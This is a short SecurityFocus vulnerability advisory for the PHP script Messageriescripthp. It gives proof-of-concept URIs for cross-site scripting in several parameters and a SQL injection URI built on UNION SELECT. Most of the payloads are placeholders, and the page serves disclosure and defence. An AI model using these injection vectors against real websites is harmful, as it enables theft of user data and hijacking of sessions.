Messageriescripthp Multiple Input Validation Vulnerabilities

To exploit the cross-site scritping issue:

An attacker can exploit this issue by enticing an unsuspecting user into following a malicious URI.

The following proof-of-concept URIs are available:
http://www.example.com//[script_messagerie_path]/existepseudo.php?pseudo=[XSS]
http://www.example.com/[script_messagerie_path]/existeemail.php?email=[XSS]
http://www.example.com/[script_messagerie_path]/Contact/contact.php?pageName=</title>[XSS]
http://www.example.com/[script_messagerie_path]/Contact/contact.php?cssform=">[XSS]<foo


To exploit aSQL-injection issue:

An attacker can exploit these issues via a web client.

The following proof-of-concept URIs are available:
http://www.example.com/[script_messagerie_path]/lire-avis.php?aa=[SQL INJECTION]
http://www,example.com/[script_messagerie_path]/membre/fiche_tousmembres.php?recordID=0 UNION SELECT
null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null FROM
etc...#


 

Privacy Statement
Copyright 2010, SecurityFocus